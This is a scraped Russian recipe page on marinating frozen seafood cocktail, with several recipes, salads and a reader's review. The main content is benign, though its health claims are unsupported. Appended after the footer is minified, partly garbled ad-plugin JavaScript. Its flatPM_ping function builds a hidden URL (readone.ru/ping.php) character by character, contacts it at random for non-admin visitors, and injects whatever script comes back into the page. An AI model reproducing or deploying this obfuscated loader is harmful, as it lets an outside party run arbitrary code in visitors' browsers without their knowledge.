Маринованные морепродукты рецепт

Вкусные рецепты

Готовим вместе с eda offline

Готовим вместе с eda offline

Рубрики

  • Бутерброды (33)
  • Вторые блюда (325)
  • Выпечка (422)
  • Гарниры (82)
  • Грибные блюда (62)
  • Десерты (150)
  • Закуски (358)
    • Горячие закуски (138)
    • Холодные закуски (87)
  • Мясные блюда (344)
  • На заметку (63)
  • Напитки (25)
  • Национальные кухни (12)
  • Овощные блюда (168)
  • Первые блюда (133)
  • Праздники (164)
    • Новый год (112)
    • Пасха (16)
    • Рождество (9)
    • Хэллоуин (21)
  • Рыбные блюда (96)
  • Салаты (173)
  • Соусы (26)
  • Тесто для (55)

Метки

Маринованный коктейль из морепродуктов, как в магазине

Маринованный магазинный морской коктейль – просто объедение! Всегда хотелось научиться делать такой же по вкусу маринад в домашних условиях. Перерыв кучу сайтов с рецептами маринования морепродуктов, методом проб и ошибок, мне удалось, наконец-то, подобрать максимально приближенный вариант. Предлагаю вашему вниманию рецепт с фото маринованного коктейля, как в магазине.

Как мариновать замороженный морской коктейль

Замороженные морепродукты продаются в любом продовольственном магазине. Я купила 500 граммовую упаковку морского коктейля, состоящего из мяса мидий, кальмаров и креветок. Если вы любите другое сочетание морепродуктов, то можете самостоятельно подобрать для себя необходимый состав, приобретая морепродукты на развес.

Первым делом отварим морепродукты. Для этого? закинем содержимое пакета в кипящую воду на 3 минуты. Размораживать предварительно ничего не нужно. Отсчет времени начинаем с момента закладывания продуктов в кипяток. Солить воду не нужно!

Через указанное время сливаем содержимое кастрюли на дуршлаг и дадим морским обитателям остыть.

Теперь, на очереди маринад. Для его приготовления нам понадобится 1 чайная ложка соли, 1,5 столовых ложки сахара, перец горошком – 5 штук, 1 листик лаврушки.

Заливаем специи 200 миллилитрами воды, добавляем 50 миллилитров 9% уксуса и 40 миллилитров растительного масла без запаха. Доводим маринад до кипения, а затем остужаем его до комнатной температуры.

Хоть рецепт заявлен «Как в магазине», но я не могу пройти мимо того, чтобы добавить к коктейлю свежий лучок. Этот ингредиент добавит вкусовую нотку основным продуктам, а сам станет дополнительным хрустящим лакомством.

Нарезаем небольшую луковицу, весом, примерно, 50 грамм, полукольцами.

Смешиваем лук и остывшие морепродукты в отдельной емкости.

Теперь можно закладывать основу для маринования в чистую банку, объемом 500 миллилитров.

Сверху морепродукты заливаем остывшим маринадом.

Закручиваем банку крышкой и отправляем в холодильник на сутки.

Через 24 часа маринованный морской коктейль выкладываем на тарелку и угощаемся великолепным блюдом.

Маринованные морепродукты – это идеальная самостоятельная закуска или наполнитель для салатов. Честно говоря, до салатов в нашей семье это блюдо никогда не доживало.

Оставьте комментарий Отменить ответ

Для отправки комментария вам необходимо авторизоваться.

Как мариновать морепродукты?

Дары моря, морепродукты являются популярными деликатесами во всех уголках мира. Морские «дары» запекают, жарят, используют для основы салата и употребляют в отварном виде. Одним из самых вкусных и питательных блюд являются маринованные морепродукты. Это кушанье отличается удивительным вкусом и неповторимым ароматом. Замариновать морепродукты в домашних условиях не составит труда.

Полезные свойства

Морскими продуктами называют беспозвоночных обитателей глубин. Это поистине кладезь полезных для человеческого организма веществ. Дары моря относят к низкокалорийным продуктам и советуют включать в рацион людям разных возрастов. В 100 граммах продукта содержится до 120 килокалорий. Отметим, что к морепродуктам не причисляют рыбу и мясо млекопитающих (моржи, тюлени и киты).

Маринованный коктейль из морских продуктов – блюдо, которое имеет сбалансированный состав полезных и легко усваиваемых компонентов. Например, креветки благоприятно влияют на защитные функции организма, снижают риск онкозаболеваний и являются мощнейшим антиоксидантом. Кальмары богаты большим содержание йода, а мидии способствуют выработке тестостерона (особенно полезны для мужчин).

Страдающим проблемами со зрением советуют регулярно употреблять в пищу мясо краба.

Маринование в домашних условиях

Приготовить пресервы из морепродуктов самостоятельно несложно. Главное – сделать это правильно. Рецепты с морскими продуктами очень разнообразны и довольно просты в приготовлении. Самый легкий и доступный из них – морепродукты в классическом маринаде.

Нам понадобится:

  • замороженные морепродукты;
  • одна луковица и три зубчика чеснока;
  • 2-3 штуки сладкого перца;
  • вода в кипяченом виде;
  • две столовые ложки масла (оливкового);
  • лист лавровый и корень сельдерея;
  • соль, перец, специи по вкусу;
  • одна столовая ложка винного уксуса.

На плиту ставим кастрюлю (3 литра) с водой, солим и бросаем лаврушку и сельдерей. При закипании засыпаем смесь из морепродуктов. Варим на среднем огне 2-3 минуты. Через дуршлаг процеживаем, отваренным морепродуктам даем остыть. В отдельной миске смешиваем воду, масло и уксус. Засыпаем специи и солим. Далее мелко режем лук, чеснок и сладкий перец. Дары моря тщательно перемешиваем с овощной смесью.

Кладем в стеклянную емкость и заливаем уже готовым маринадом. Отправляем в холодильник на 3-5 часов, периодически встряхивая емкость. Спустя указанный период, удивительно вкусное блюдо будет готово. Можно подавать к столу в виде закуски. Равнодушных не останется!

Рецепты

С маринованными морепродуктами получится удивительный салат. Для этого блюда подойдут только «свежезакатанные» банки с коктейлем из креветок, осьминогов, кальмаров и мидий. Вскрывать банку желательно перед самым процессом приготовления. Берем:

  • маринованный морской коктейль (150 граммов);
  • листья салата;
  • лимонный сок;
  • луковица (красный сорт);
  • отварные перепелиные яйца (3-4 штуки);
  • оливковое масло и винный белый уксус (40 мл);
  • перец (белый), соль, сахар специи по вкусу;
  • зелень.

Режем лук тонкими кольцами и маринуем его в уксусе с добавлением сахара. Моем салатные листья, рвем их руками и укладываем на блюдо. Яйца очищаем от скорлупы и режем пополам. На листья салата выкладываем морепродукты, по бокам украшаем половинками яиц. Сверху кладем колечки маринованного лука. Поливаем салат оливковым маслом, сбрызгиваем соком лимона, солим, перчим и украшаем зеленью. Пальчики оближешь!

Еще одно удивительное блюдо, которое порадует ваших близких и друзей – морской коктейль в масле. Итак, приступаем:

  • размораживаем приобретенную в магазине смесь из морепродуктов;
  • сливаем всю воду, тщательно промываем;
  • на предварительно разогретую сковороду наливаем растительное масло и обжариваем лук (режем кольцами);
  • как только он станет мягким, высыпаем смесь морепродуктов, жарим на среднем огне 7-10 минут;
  • солим и перчим в процессе.

Это невероятно нежное и потрясающее кушанье подают к столу с отварным рисом и овощами. Приятного аппетита!

Кроме того, морепродукты, приготовленные в масле, широко используют как основу для салатов и в качестве ингредиентов для пиццы.

И еще один рецепт смотрите в следующем видео.

Маринованные морепродукты рецепт

Ингредиенты

ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
коктейль из морепродуктов замороженный (креветки, кальмары, осьминоги, мидии) 300 гр.
корень сельдерея 20 гр.
лавровый лист 3 шт.
оливковое масло 1 ст. ложка 898
кипяченая вода пол стакана
уксус винный 1 ст. ложка
лук репчатый 1\3 шт. 43
перец сладкий 1\3 шт.
чеснок 1\2 зубчика 106
соль, специи (сушёный укроп и базилик) по вкусу

Пошаговый рецепт приготовления Маринованные морепродукты с фото

Итак, приступим к приготовлению:

Если вы решили использовать коктейль из замороженного вида морепродуктов, вам не обязательно их размораживать, так как все равно вы поместите их в горячую воду. Поставьте емкость с подсоленной водой на огонь, добавьте лавровый лист и корень сельдерея. Доведите воду до кипения и отправьте в нее коктейль из морских продуктов. Варите все несколько минут.

Видеорецепт Маринованные морепродукты

Салат с маринованными морепродуктами

Например, можете приготовить салат с маринованными морепродуктами. О рецепте приготовления этого лакомства мы вам сейчас расскажем. Это лакомство готовится очень просто, но в результате получается праздничный на вид и очень вкусный салат.

Итак, для того чтобы приготовить салат по этому рецепту вам понадобится:

Ингредиенты:
маринованные креветки – 200 грамм;
твердый сыр – 200 грамм;
отварные яйца – 4 штуки;
салатные листья – 1 пучок;
чеснок – 2 зубка;
майонез.

    Возьмите емкость и переложите в нее маринованные креветки.

Промойте под проточной водой салатные листья и порвите их руками.

Возьмите мелкую терку и потрите заранее отваренные яйца и сыр.

В чистую пиалу вылейте майонез, добавьте измельченный чеснок.

Теперь вам понадобится плоское блюдо, на него мы будем выкладывать салат слоями. Первым слоем выкладывайте салатные листья, затем маринованные креветки, третьим слоем потертый сыр, далее яйца и каждый слой перемазывайте массой, которую вы приготовили из майонеза и чеснока.

  • Сверху лакомство украсьте креветками.
  • Приятного вам аппетита!

    Отзыв: Коктейль из маринованных морепродуктов по домашнему Хладпром – Просто пальчики оближешь

    Уж так у нас повелось что я и вся моя семья являемся приверженцами здорового образа жизни, но нельзя представить себе здоровый образ жизни без натурального и здорового питания. По этим и ещё массе других причин я предпочитаю готовить сама. Неотъемлемой частью здорового питание является употребление в пищу морепродуктов. Нам очень полюбился коктейль из морепродуктов, который продаётся практически в каждом супермаркете, но несмотря на то что упаковочка там совсем маленькая – стоит она не дёшево. Ну и в связи с этим я решила попробовать мариновать морепродукты самостоятельно. Ну и вот путём проб и ошибок я пришла на мой взгляд к идеальному рецепту, которым и решила поделиться с вами. Больше всего в морском коктейле нам нравятся кальмары и сегодняшний мой рецепт посвящается именно им. В двух словах расскажу как приготовить самих кальмаров, поскольку если вы хотите чтобы они были мягкие и нежные – их ни в коем случае нельзя варить.

    И так самые обычные замороженные кальмары, купленные в Монетке по цене около 100 руб за 500 гр.

    Для начала кальмары нужно хорошенько почистить и помыть, чистятся они очень просто, выкладываем их в любую глубокую посуду и хорошенько обдаём кипятком. Весь процесс не должен превышать одной минуты. Затем под проточной водой пальцами счищаем верхнюю кожицу а также все внутренности.

    Происходит всё очень просто и быстро, без всяких усилий.

    Так вот выше я уже говорила о том что варить кальмары ни в коем случае нельзя иначе они станут просто резиновыми. Для дальнейшего их приготовления нужно ещё два раза залить наши кальмары крутым кипятком. Каждый раз они должны находиться в кипятке не более одной минуты. И только после данных процедур наши кальмарчики будут нежными и мягкими.

    На фото выше – кальмары после первого ошпаривания.

    Так они выглядят после второго ошпаривания.

    И вот они ошпарены в третий раз, помыты и разделаны на небольшие кусочки.
    В дальнейшем нарезаем наши кальмары каждый по своему усмотрению, я нарезаю соломкой.

    Пришло время приготовить маринад. Для этого потребуется – 1 чайная ложка соли, 2 чайные ложки сахара, перец горошком 6 шт, перец душистый 2 шт, 1 лавровый лист, 50 мл уксуса, 40 мл растительного масла и 200 мл воды. Пропорции взяты для 500 гр кальмаров.

    И так все вышеперечисленные составляющие, за исключением уксуса и подсолнечного масла, складываем в кастрюльку и доводим до кипения. Даём полностью остыть.

    На любителя – я добавляю к моим кальмарам лук предварительно порезанный кольцами.

    Перемешиваю кальмары с луком и укладываю в стеклянную баночку.

    Добавляю уксус и растительное масло, заливаю остывшим маринадом.

    Закрываю плотно баночку и отправляю в холодильник на 24 часа. Поверьте мне на слово – блюдо получается очень вкусным, а главное и полезным. Всем приятного аппетита .

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};